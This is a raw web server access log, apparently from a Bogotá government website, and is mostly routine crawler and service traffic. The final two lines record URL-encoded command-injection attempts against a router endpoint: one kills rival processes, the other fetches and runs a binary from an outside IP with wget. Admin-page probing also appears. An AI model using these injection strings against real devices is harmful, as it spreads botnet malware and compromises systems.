201.245.192.253 - - [03/Jul/2024:04:36:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 31858
172.22.2.4 - - [03/Jul/2024:04:36:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59583
172.22.2.4 - - [03/Jul/2024:04:38:05 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000005%20DEL%2013%20DE%20JUNIO%20DEL%202023.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Jul/2024:04:38:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [03/Jul/2024:04:38:16 -0500] "GET /BLA/resoluciones/AUTOS%202018/1218.pdf HTTP/1.1" 200 259421
201.245.192.253 - - [03/Jul/2024:04:38:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [03/Jul/2024:04:38:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/1195.pdf HTTP/1.1" 200 595680
201.245.192.253 - - [03/Jul/2024:04:39:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39627
201.245.192.253 - - [03/Jul/2024:04:39:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
216.245.221.92 - - [03/Jul/2024:04:39:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:04:39:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:40:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
168.119.253.13 - - [03/Jul/2024:04:40:26 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [03/Jul/2024:04:40:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:39:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [03/Jul/2024:04:41:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.55.39.201 - - [03/Jul/2024:04:41:39 -0500] "GET /BLA/resoluciones/AUTOS%202022/4516.pdf HTTP/1.1" 200 365703
201.245.192.253 - - [03/Jul/2024:04:42:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [03/Jul/2024:04:42:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4035.pdf HTTP/1.1" 304 -
40.77.167.76 - - [03/Jul/2024:04:42:18 -0500] "GET /Publicaciones/2024EE119070.pdf HTTP/1.1" 200 1052774
201.245.192.253 - - [03/Jul/2024:04:42:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:04:41:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Jul/2024:04:43:05 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
201.245.192.253 - - [03/Jul/2024:04:43:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:04:42:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
201.245.192.253 - - [03/Jul/2024:04:44:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:04:44:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
216.245.221.92 - - [03/Jul/2024:04:44:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:04:44:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:04:43:51 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61913
201.245.192.253 - - [03/Jul/2024:04:45:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [03/Jul/2024:04:46:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3184.pdf HTTP/1.1" 200 395304
201.245.192.253 - - [03/Jul/2024:04:46:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.139 - - [03/Jul/2024:04:46:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2714.pdf HTTP/1.1" 304 -
157.55.39.201 - - [03/Jul/2024:04:46:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/2763.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Jul/2024:04:46:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:47:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:48:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:04:48:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [03/Jul/2024:04:48:40 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [03/Jul/2024:04:47:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
176.113.115.254 - - [03/Jul/2024:04:48:52 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 2324
176.113.115.254 - - [03/Jul/2024:04:48:52 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 2324
176.113.115.254 - - [03/Jul/2024:04:48:52 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 2324
201.245.192.253 - - [03/Jul/2024:04:49:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
185.191.126.213 - - [03/Jul/2024:04:49:25 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [03/Jul/2024:04:49:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Jul/2024:04:47:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56191
201.245.192.253 - - [03/Jul/2024:04:49:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [03/Jul/2024:04:50:03 -0500] "GET /autoliquidacion/Auto%20Declaraci%C3%B3nTr%C3%A1mite%20de%20Licenciamiento%20Urban%C3%ADstico%20y%20Actos%20de%20Reconocimiento%20de%20Usos%20Industriales/Anexo%201.%20Formato%20de%20calificaci%C3%B3n%20de%20usos%20industrial.pdf HTTP/1.1" 200 403314
201.245.192.253 - - [03/Jul/2024:04:50:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:04:50:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.7 - - [03/Jul/2024:04:51:00 -0500] "GET /BLA/resoluciones/AUTOS%202022/5799.pdf HTTP/1.1" 200 312142
201.245.192.253 - - [03/Jul/2024:04:51:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:52:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:04:52:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:53:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:54:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:04:54:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
216.245.221.92 - - [03/Jul/2024:04:54:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Jul/2024:04:52:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:04:54:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [03/Jul/2024:04:55:06 -0500] "GET /BLA/resoluciones/AUTOS%202013/0365.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Jul/2024:04:53:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51561
201.245.192.253 - - [03/Jul/2024:04:55:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:56:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:04:56:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:57:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [03/Jul/2024:04:58:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%202151-2200/00002155.tif HTTP/1.1" 200 243596
201.245.192.253 - - [03/Jul/2024:04:58:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:04:58:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:59:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
216.245.221.92 - - [03/Jul/2024:04:59:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:04:59:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:00:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.19 - - [03/Jul/2024:05:00:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4287.pdf HTTP/1.1" 200 540659
66.249.66.19 - - [03/Jul/2024:05:00:13 -0500] "GET /BLA/resoluciones/AUTOS%202018/5543.pdf HTTP/1.1" 200 296666
172.22.2.4 - - [03/Jul/2024:04:58:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.39 - - [03/Jul/2024:05:00:29 -0500] "GET /semana-bogota-reverdece-se-plantaron-200-nuevos-arboles-en-el-humedal-tingua-azul-bosa.html HTTP/1.1" 200 896
201.245.192.253 - - [03/Jul/2024:05:00:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [03/Jul/2024:05:00:55 -0500] "GET /BLA/resoluciones/AUTOS%202012/0162.pdf HTTP/1.1" 200 308613
66.249.66.19 - - [03/Jul/2024:05:01:13 -0500] "GET /BLA/resoluciones/AUTOS%202018/4171.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Jul/2024:04:59:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
190.90.147.98 - - [03/Jul/2024:05:01:16 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
190.90.147.98 - - [03/Jul/2024:05:01:16 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.90.147.98 - - [03/Jul/2024:05:01:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 892005
190.90.147.98 - - [03/Jul/2024:05:01:20 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
216.244.66.195 - - [03/Jul/2024:05:01:29 -0500] "GET /BLA/resoluciones/AUTOS%202012/0199.pdf HTTP/1.1" 200 331205
201.245.192.253 - - [03/Jul/2024:05:01:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [03/Jul/2024:05:02:05 -0500] "GET /BLA/resoluciones/AUTOS%202019/0003.pdf HTTP/1.1" 200 584266
201.245.192.253 - - [03/Jul/2024:05:02:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.21 - - [03/Jul/2024:05:02:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2360.pdf HTTP/1.1" 200 467610
66.249.66.21 - - [03/Jul/2024:05:02:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9675.pdf HTTP/1.1" 200 537058
201.245.192.253 - - [03/Jul/2024:05:02:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [03/Jul/2024:05:02:49 -0500] "GET /BLA/resoluciones/AUTOS%202019/1471.pdf HTTP/1.1" 200 262699
66.249.66.13 - - [03/Jul/2024:05:03:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/2952.pdf HTTP/1.1" 304 -
66.249.66.13 - - [03/Jul/2024:05:03:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1090.pdf HTTP/1.1" 200 614579
216.244.66.195 - - [03/Jul/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202019/1559.pdf HTTP/1.1" 200 268138
201.245.192.253 - - [03/Jul/2024:05:03:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:04:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:05:04:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
216.244.66.195 - - [03/Jul/2024:05:04:14 -0500] "GET /BLA/resoluciones/AUTOS%202019/1627.pdf HTTP/1.1" 200 343425
216.245.221.92 - - [03/Jul/2024:05:04:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:04:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [03/Jul/2024:05:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202019/1741.pdf HTTP/1.1" 200 265359
216.244.66.195 - - [03/Jul/2024:05:05:16 -0500] "GET /BLA/resoluciones/AUTOS%202019/2441.pdf HTTP/1.1" 200 515254
201.245.192.253 - - [03/Jul/2024:05:05:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [03/Jul/2024:05:05:46 -0500] "GET /BLA/resoluciones/AUTOS%202019/2707.pdf HTTP/1.1" 200 342898
201.245.192.253 - - [03/Jul/2024:05:06:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [03/Jul/2024:05:06:13 -0500] "GET /BLA/resoluciones/AUTOS%202019/3107.pdf HTTP/1.1" 200 259999
172.22.2.4 - - [03/Jul/2024:05:04:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:06:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [03/Jul/2024:05:06:40 -0500] "GET /BLA/resoluciones/AUTOS%202019/3256.pdf HTTP/1.1" 200 339962
172.22.2.4 - - [03/Jul/2024:05:05:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
216.244.66.195 - - [03/Jul/2024:05:07:05 -0500] "GET /BLA/resoluciones/AUTOS%202019/3354.pdf HTTP/1.1" 200 216939
216.244.66.195 - - [03/Jul/2024:05:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202019/4200.pdf HTTP/1.1" 200 287645
201.245.192.253 - - [03/Jul/2024:05:07:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [03/Jul/2024:05:07:56 -0500] "GET /BLA/resoluciones/AUTOS%202019/4445.pdf HTTP/1.1" 200 268549
201.245.192.253 - - [03/Jul/2024:05:08:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [03/Jul/2024:05:08:21 -0500] "GET /BLA/resoluciones/AUTOS%202023/0253.pdf HTTP/1.1" 200 432646
201.245.192.253 - - [03/Jul/2024:05:08:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
162.55.162.137 - - [03/Jul/2024:05:08:35 -0500] "GET / HTTP/1.1" 200 4720
216.244.66.195 - - [03/Jul/2024:05:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202023/1859.pdf HTTP/1.1" 200 407721
216.244.66.195 - - [03/Jul/2024:05:09:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00546.pdf HTTP/1.1" 200 376595
201.245.192.253 - - [03/Jul/2024:05:09:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
66.249.66.13 - - [03/Jul/2024:05:09:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0185.pdf HTTP/1.1" 200 2066018
216.244.66.195 - - [03/Jul/2024:05:09:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00736.pdf HTTP/1.1" 200 377018
216.245.221.92 - - [03/Jul/2024:05:09:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:09:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:10:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [03/Jul/2024:05:10:32 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [03/Jul/2024:05:10:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:11:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:05:10:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:12:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [03/Jul/2024:05:10:36 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 46859
201.245.192.253 - - [03/Jul/2024:05:12:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:05:11:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49224
201.245.192.253 - - [03/Jul/2024:05:13:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:14:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
201.245.192.253 - - [03/Jul/2024:05:14:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [03/Jul/2024:05:14:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:14:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [03/Jul/2024:05:15:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201201-1250/00001202.tif HTTP/1.1" 200 164170
201.245.192.253 - - [03/Jul/2024:05:15:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
51.222.253.10 - - [03/Jul/2024:05:15:40 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.14 - - [03/Jul/2024:05:16:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2465.pdf HTTP/1.1" 304 -
66.249.66.13 - - [03/Jul/2024:05:16:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6527.pdf HTTP/1.1" 200 430171
201.245.192.253 - - [03/Jul/2024:05:16:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:05:16:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [03/Jul/2024:05:17:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20551-600/00000588.tif HTTP/1.1" 200 61990
201.245.192.253 - - [03/Jul/2024:05:17:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:17:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33472
201.245.192.253 - - [03/Jul/2024:05:16:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
172.22.2.4 - - [03/Jul/2024:05:16:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.14 - - [03/Jul/2024:05:18:04 -0500] "GET /BLA/resoluciones/AUTOS%202018/1442.pdf HTTP/1.1" 200 1266124
66.249.66.14 - - [03/Jul/2024:05:18:05 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/430.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Jul/2024:05:18:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:05:18:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:05:17:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
66.249.66.21 - - [03/Jul/2024:05:19:05 -0500] "GET /isolucionsda/Arriba.asp?Pagina=/isolucionsda/bancoconocimiento/R/Resolucion5537del28deSeptiembrede2011/Resolucion5537del28deSeptiembrede2011.asp&IdArticulo=6572 HTTP/1.1" 200 527
201.245.192.253 - - [03/Jul/2024:05:19:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39626
201.245.192.253 - - [03/Jul/2024:05:19:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
216.245.221.92 - - [03/Jul/2024:05:19:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:19:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [03/Jul/2024:05:20:05 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-131.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Jul/2024:05:20:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:05:20:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:19:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33472
201.245.192.253 - - [03/Jul/2024:05:21:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:22:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:05:22:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:05:22:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
201.245.192.253 - - [03/Jul/2024:05:23:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:05:22:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:05:24:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
201.245.192.253 - - [03/Jul/2024:05:24:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [03/Jul/2024:05:24:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Jul/2024:05:22:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
201.245.192.253 - - [03/Jul/2024:05:24:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
141.98.83.197 - - [03/Jul/2024:05:25:17 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [03/Jul/2024:05:25:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:05:26:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
45.148.10.174 - - [03/Jul/2024:05:26:22 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [03/Jul/2024:05:26:23 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
